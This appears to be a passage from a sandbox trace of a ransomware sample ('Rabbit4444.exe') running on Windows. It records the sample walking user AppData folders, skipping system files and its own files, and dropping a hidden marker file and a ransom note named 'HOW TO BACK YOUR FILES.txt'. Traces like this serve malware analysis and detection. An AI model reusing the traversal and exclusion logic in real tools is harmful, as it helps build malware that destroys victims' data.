cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.974] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.974] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.974] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf13daa80, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf13daa80, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf13daa80, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.974] FindClose (in: hFindFile=0x1025d0 | out: hFindFile=0x1025d0) returned 1 [0066.974] lstrcpyW (in: lpString1=0x130ec08, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.974] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\\AC\\INetCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.holographicfirstrun_cw5n1h2txyewy\\ac\\inetcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.975] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.975] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.975] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.975] CloseHandle (hObject=0x27c) returned 1 [0066.975] CloseHandle (hObject=0x228) returned 1 [0066.975] GetCurrentThreadId () returned 0xd98 [0066.975] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x11cde8 [0066.975] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy" [0066.975] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11da10 | out: hHeap=0xe0000) returned 1 [0066.975] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11cde0 | out: hHeap=0xe0000) returned 1 [0066.975] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy" [0066.975] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\" [0066.975] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" [0066.975] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.977] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.980] FlushFileBuffers (hFile=0x228) returned 1 [0066.980] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.981] CloseHandle (hObject=0x228) returned 1 [0066.981] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy") returned 78 [0066.981] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.981] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x814d4f06, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdade5d03, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf13daa80, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0066.981] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.981] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.981] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.981] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.981] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x814d4f06, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdade5d03, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xf13daa80, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.981] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.982] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.982] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.982] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.982] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.982] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf13daa80, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf13daa80, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf1400cf2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.982] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.982] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.982] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8156d87b, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x36b47a04, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x36b47a04, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 1 [0066.982] lstrcmpiW (lpString1="AC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.982] lstrcmpiW (lpString1="AC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.982] lstrcmpiW (lpString1="AC", lpString2="Rabbit4444.exe") returned -1 [0066.982] lstrcmpiW (lpString1="AC", lpString2=".") returned 1 [0066.982] lstrcmpiW (lpString1="AC", lpString2="..") returned 1 [0066.982] lstrcmpiW (lpString1="AC", lpString2="windows") returned -1 [0066.982] lstrcmpiW (lpString1="AC", lpString2="bootmgr") returned -1 [0066.982] lstrcmpiW (lpString1="AC", lpString2="pagefile.sys") returned -1 [0066.982] lstrcmpiW (lpString1="AC", lpString2="boot") returned -1 [0066.982] lstrcmpiW (lpString1="AC", lpString2="ids.txt") returned -1 [0066.982] lstrcmpiW (lpString1="AC", lpString2="NTUSER.DAT") returned -1 [0066.982] lstrcpyW (in: lpString1=0x130ebd6, lpString2="AC" | out: lpString1="AC") returned="AC" [0066.982] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122080 [0066.982] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa4) returned 0x118de8 [0066.982] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122088 | out: ListHead=0xf68b0, ListEntry=0x122088) returned 0x11d048 [0066.982] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x814fb197, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x36b93ea6, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x36b93ea6, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0066.982] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.982] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.982] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0066.982] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0066.982] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0066.982] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0066.982] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0066.982] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0066.982] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0066.982] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0066.982] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0066.983] lstrcpyW (in: lpString1=0x130ebd6, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0066.983] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122100 [0066.983] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xae) returned 0x124308 [0066.983] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122108 | out: ListHead=0xf68b0, ListEntry=0x122108) returned 0x122088 [0066.983] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x814d4f06, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd04837c4, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x814d4f06, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0066.983] lstrcmpiW (lpString1="LocalCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.983] lstrcmpiW (lpString1="LocalCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.983] lstrcmpiW (lpString1="LocalCache", lpString2="Rabbit4444.exe") returned -1 [0066.983] lstrcmpiW (lpString1="LocalCache", lpString2=".") returned 1 [0066.983] lstrcmpiW (lpString1="LocalCache", lpString2="..") returned 1 [0066.983] lstrcmpiW (lpString1="LocalCache", lpString2="windows") returned -1 [0066.983] lstrcmpiW (lpString1="LocalCache", lpString2="bootmgr") returned 1 [0066.983] lstrcmpiW (lpString1="LocalCache", lpString2="pagefile.sys") returned -1 [0066.983] lstrcmpiW (lpString1="LocalCache", lpString2="boot") returned 1 [0066.983] lstrcmpiW (lpString1="LocalCache", lpString2="ids.txt") returned 1 [0066.983] lstrcmpiW (lpString1="LocalCache", lpString2="NTUSER.DAT") returned -1 [0066.983] lstrcpyW (in: lpString1=0x130ebd6, lpString2="LocalCache" | out: lpString1="LocalCache") returned="LocalCache" [0066.983] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122020 [0066.983] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb4) returned 0x122cc0 [0066.983] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122028 | out: ListHead=0xf68b0, ListEntry=0x122028) returned 0x122108 [0066.983] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x814d4f06, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x1edc172b, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x1edc172b, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0066.983] lstrcmpiW (lpString1="LocalState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.983] lstrcmpiW (lpString1="LocalState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.983] lstrcmpiW (lpString1="LocalState", lpString2="Rabbit4444.exe") returned -1 [0066.983] lstrcmpiW (lpString1="LocalState", lpString2=".") returned 1 [0066.983] lstrcmpiW (lpString1="LocalState", lpString2="..") returned 1 [0066.983] lstrcmpiW (lpString1="LocalState", lpString2="windows") returned -1 [0066.983] lstrcmpiW (lpString1="LocalState", lpString2="bootmgr") returned 1 [0066.983] lstrcmpiW (lpString1="LocalState", lpString2="pagefile.sys") returned -1 [0066.983] lstrcmpiW (lpString1="LocalState", lpString2="boot") returned 1 [0066.983] lstrcmpiW (lpString1="LocalState", lpString2="ids.txt") returned 1 [0066.983] lstrcmpiW (lpString1="LocalState", lpString2="NTUSER.DAT") returned -1 [0066.983] lstrcpyW (in: lpString1=0x130ebd6, lpString2="LocalState" | out: lpString1="LocalState") returned="LocalState" [0066.983] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122160 [0066.984] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb4) returned 0x122d80 [0066.984] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122168 | out: ListHead=0xf68b0, ListEntry=0x122168) returned 0x122028 [0066.984] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x814d4f06, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd082fb18, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x814d4f06, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0066.984] lstrcmpiW (lpString1="RoamingState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.984] lstrcmpiW (lpString1="RoamingState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.984] lstrcmpiW (lpString1="RoamingState", lpString2="Rabbit4444.exe") returned 1 [0066.984] lstrcmpiW (lpString1="RoamingState", lpString2=".") returned 1 [0066.984] lstrcmpiW (lpString1="RoamingState", lpString2="..") returned 1 [0066.984] lstrcmpiW (lpString1="RoamingState", lpString2="windows") returned -1 [0066.984] lstrcmpiW (lpString1="RoamingState", lpString2="bootmgr") returned 1 [0066.984] lstrcmpiW (lpString1="RoamingState", lpString2="pagefile.sys") returned 1 [0066.984] lstrcmpiW (lpString1="RoamingState", lpString2="boot") returned 1 [0066.984] lstrcmpiW (lpString1="RoamingState", lpString2="ids.txt") returned 1 [0066.984] lstrcmpiW (lpString1="RoamingState", lpString2="NTUSER.DAT") returned 1 [0066.984] lstrcpyW (in: lpString1=0x130ebd6, lpString2="RoamingState" | out: lpString1="RoamingState") returned="RoamingState" [0066.984] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122040 [0066.984] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb8) returned 0x122f00 [0066.984] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122048 | out: ListHead=0xf68b0, ListEntry=0x122048) returned 0x122168 [0066.984] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x814fb197, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x712cc700, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x712cc700, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 1 [0066.984] lstrcmpiW (lpString1="Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.984] lstrcmpiW (lpString1="Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.984] lstrcmpiW (lpString1="Settings", lpString2="Rabbit4444.exe") returned 1 [0066.984] lstrcmpiW (lpString1="Settings", lpString2=".") returned 1 [0066.984] lstrcmpiW (lpString1="Settings", lpString2="..") returned 1 [0066.984] lstrcmpiW (lpString1="Settings", lpString2="windows") returned -1 [0066.984] lstrcmpiW (lpString1="Settings", lpString2="bootmgr") returned 1 [0066.984] lstrcmpiW (lpString1="Settings", lpString2="pagefile.sys") returned 1 [0066.984] lstrcmpiW (lpString1="Settings", lpString2="boot") returned 1 [0066.984] lstrcmpiW (lpString1="Settings", lpString2="ids.txt") returned 1 [0066.984] lstrcmpiW (lpString1="Settings", lpString2="NTUSER.DAT") returned 1 [0066.984] lstrcpyW (in: lpString1=0x130ebd6, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0066.984] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222a0 [0066.984] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb0) returned 0x123b20 [0066.984] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222a8 | out: ListHead=0xf68b0, ListEntry=0x1222a8) returned 0x122048 [0066.984] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xda246550, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xda246550, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xda246550, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0066.985] lstrcmpiW (lpString1="SystemAppData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.985] lstrcmpiW (lpString1="SystemAppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.985] lstrcmpiW (lpString1="SystemAppData", lpString2="Rabbit4444.exe") returned 1 [0066.985] lstrcmpiW (lpString1="SystemAppData", lpString2=".") returned 1 [0066.985] lstrcmpiW (lpString1="SystemAppData", lpString2="..") returned 1 [0066.985] lstrcmpiW (lpString1="SystemAppData", lpString2="windows") returned -1 [0066.985] lstrcmpiW (lpString1="SystemAppData", lpString2="bootmgr") returned 1 [0066.985] lstrcmpiW (lpString1="SystemAppData", lpString2="pagefile.sys") returned 1 [0066.985] lstrcmpiW (lpString1="SystemAppData", lpString2="boot") returned 1 [0066.985] lstrcmpiW (lpString1="SystemAppData", lpString2="ids.txt") returned 1 [0066.985] lstrcmpiW (lpString1="SystemAppData", lpString2="NTUSER.DAT") returned 1 [0066.985] lstrcpyW (in: lpString1=0x130ebd6, lpString2="SystemAppData" | out: lpString1="SystemAppData") returned="SystemAppData" [0066.985] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122280 [0066.985] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xba) returned 0xefb28 [0066.985] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122288 | out: ListHead=0xf68b0, ListEntry=0x122288) returned 0x1222a8 [0066.985] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x814d4f06, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd095f4e0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x814d4f06, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0066.985] lstrcmpiW (lpString1="TempState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.985] lstrcmpiW (lpString1="TempState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.985] lstrcmpiW (lpString1="TempState", lpString2="Rabbit4444.exe") returned 1 [0066.985] lstrcmpiW (lpString1="TempState", lpString2=".") returned 1 [0066.985] lstrcmpiW (lpString1="TempState", lpString2="..") returned 1 [0066.985] lstrcmpiW (lpString1="TempState", lpString2="windows") returned -1 [0066.985] lstrcmpiW (lpString1="TempState", lpString2="bootmgr") returned 1 [0066.985] lstrcmpiW (lpString1="TempState", lpString2="pagefile.sys") returned 1 [0066.985] lstrcmpiW (lpString1="TempState", lpString2="boot") returned 1 [0066.985] lstrcmpiW (lpString1="TempState", lpString2="ids.txt") returned 1 [0066.985] lstrcmpiW (lpString1="TempState", lpString2="NTUSER.DAT") returned 1 [0066.985] lstrcpyW (in: lpString1=0x130ebd6, lpString2="TempState" | out: lpString1="TempState") returned="TempState" [0066.985] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122340 [0066.985] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb2) returned 0x122b40 [0066.985] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122348 | out: ListHead=0xf68b0, ListEntry=0x122348) returned 0x122288 [0066.985] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x814d4f06, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd095f4e0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x814d4f06, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0066.985] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0066.986] lstrcpyW (in: lpString1=0x130ebd6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.986] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.987] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.987] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.987] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.987] CloseHandle (hObject=0x27c) returned 1 [0066.987] CloseHandle (hObject=0x228) returned 1 [0066.987] GetCurrentThreadId () returned 0xd98 [0066.987] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122348 [0066.987] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\TempState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\TempState" [0066.987] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122b40 | out: hHeap=0xe0000) returned 1 [0066.987] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122340 | out: hHeap=0xe0000) returned 1 [0066.987] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\TempState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\TempState" [0066.987] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\TempState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\TempState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\TempState\\" [0066.987] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\TempState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: 